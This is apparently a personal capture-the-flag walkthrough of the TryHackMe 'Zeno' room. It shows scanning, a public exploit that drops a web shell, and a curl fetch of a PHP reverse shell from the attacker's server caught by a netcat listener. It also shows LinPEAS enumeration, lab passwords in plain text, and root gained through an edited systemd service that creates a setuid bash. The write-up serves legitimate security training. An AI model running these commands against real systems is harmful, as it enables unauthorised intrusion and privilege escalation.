> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/zeno.md).

# Zeno

R**oom Link:** <https://tryhackme.com/room/zeno>

## **Scans**

Initial scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F3MzMk4mAl0gQMIOIMkl4%2Fimage.png?alt=media&amp;token=25b4fa4f-95da-468f-a950-9253592908de" alt=""><figcaption></figcaption></figure>

Longer scan

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FPUurrrW7HSF29DZ1EEWs%2Fimage.png?alt=media&amp;token=d0275dd3-a54f-4edc-ae28-8650857efcb7" alt=""><figcaption></figcaption></figure>

## TCP/12340- HTTP

**Kali**

```
gobuster dir -u http://$VICTIM:12340 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FzZ4mNt5SrYXjU3OJ0Aw1%2Fimage.png?alt=media&amp;token=0255cf76-37f2-4102-8bb3-8d7ee6ec33ed" alt=""><figcaption></figcaption></figure>

## Restaurant Management System Exploit

**Exploit:** <https://www.exploit-db.com/raw/47520>

The code needed some fixing up

**From**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FkA47hM0IgF3yOw45joVX%2Fimage.png?alt=media&amp;token=433448c3-1fb0-4bcb-93fd-82c056f6fc69" alt=""><figcaption></figcaption></figure>

**To**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FsK1RWxH9FYa8LGNYm9kS%2Fimage.png?alt=media&amp;token=cc920429-423e-45f8-96fd-f60408981d78" alt=""><figcaption></figcaption></figure>

**Kali**

```
python exploit.py http://$VICTIM:12340/rms/
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FQjQ66hgjScWPuWc4x0Ih%2Fimage.png?alt=media&amp;token=5f5c9f63-deca-47fd-88d6-b684f21cfecd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FYk3djWUAl1GlV136VNFF%2Fimage.png?alt=media&amp;token=f3235d9b-4c08-47aa-88a8-4132709b65dd" alt=""><figcaption></figcaption></figure>

**Kali**

```
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php 
```

**Kali**

```
python2 -m SimpleHTTPServer 81
```

**Browser**

```
http://$VICTIM:12340/rms/images/reverse-shell.php?cmd=curl%20-O%20http://10.10.57.58:81/php-reverse-shell.php
```

**Kali**

```
nc -lvnp 1337
```

**Browser**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F3e97PZ8KlBSrvEKT3N2y%2Fimage.png?alt=media&amp;token=64407b9b-1178-467e-82d6-c6916afdc8eb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F9mLxKWFf3vq7PRKcdt4o%2Fimage.png?alt=media&amp;token=7230da0a-bf25-4863-bd94-ee093d644432" alt=""><figcaption></figcaption></figure>

Get autocomplete

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

### LinPeas

**Kali**

```
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp/
curl -O http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FSn83UbYa8a9v4ny1ckYe%2Fimage.png?alt=media&amp;token=b3bf77c2-37fb-45d0-8375-dd32d9d55493" alt=""><figcaption></figcaption></figure>

## MySQL

**Victim**

```
mysql -u root -pveerUffIrangUfcubyig
```

**Victim(mysql)**

```
show databases;
use dbrms;
show tables;
select * from members;
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FRIhyLF0WEzInJLkhRgd5%2Fimage.png?alt=media&amp;token=09b98f3a-c5d5-4bba-bfa6-41b1e50776e8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXfNL19l96sbisubS1eqM%2Fimage.png?alt=media&amp;token=4eae5b05-1537-4b18-a7e3-6a5b6050c24c" alt=""><figcaption></figcaption></figure>

Edwards password was still not found

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FMKxESTjRSl5WZQFr4jEL%2Fimage.png?alt=media&amp;token=8c2b2ee6-eb58-4635-a679-f6602a69d400" alt=""><figcaption></figcaption></figure>

I went back to linpeas and found another password, it's for a different user but it still worked.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FKqU7mscwTq23XGXioLCW%2Fimage.png?alt=media&amp;token=2080a77a-056a-4c64-b86d-fe6e554bede2" alt=""><figcaption></figcaption></figure>

## TCP/22- SSH

**Kali**

```
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
```

**Victim(edward)**

```
sudo -l
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FyQMpz6RQR4MvhM0IcrXy%2Fimage.png?alt=media&amp;token=33a0150b-8ad6-4945-ad1e-f345ebaa44b5" alt=""><figcaption></figcaption></figure>

**Victim(apache)**

```
find /etc -type f -perm /g=w -exec ls -l {} + 2> /dev/null 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FMIjTrdwfa7ZakJ3J66nz%2Fimage.png?alt=media&amp;token=22f0648e-c65e-4b62-bcc1-aee1b848ce14" alt=""><figcaption></figcaption></figure>

**Victim(apache)**

```
vi /etc/systemd/system/zeno-monitoring.service
```

**From**

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FRwxBAjmGnFM4bdehBEfH%2Fimage.png?alt=media&amp;token=95b5701e-092b-4636-9a3c-b85d348145b1" alt=""><figcaption></figcaption></figure>

**To**

```
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/bash_root; chmod +xs /home/edward/bash_root'

[Install]
WantedBy=multi-user.target
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FADBUYcX3VtKLhnNiJdlf%2Fimage.png?alt=media&amp;token=959320e3-956b-4a95-9575-b5bf6a883a33" alt=""><figcaption></figcaption></figure>

**Victim(edward)**

```
sudo /usr/sbin/reboot
```

**Kali**

```
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
```

**Victim(edward)**

```
ls -lah
./bash_root -p
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fs8vmP6Dk1etmj3e0C4kg%2Fimage.png?alt=media&amp;token=8e3134ae-77f2-4df0-a437-2e465a266732" alt=""><figcaption></figcaption></figure>
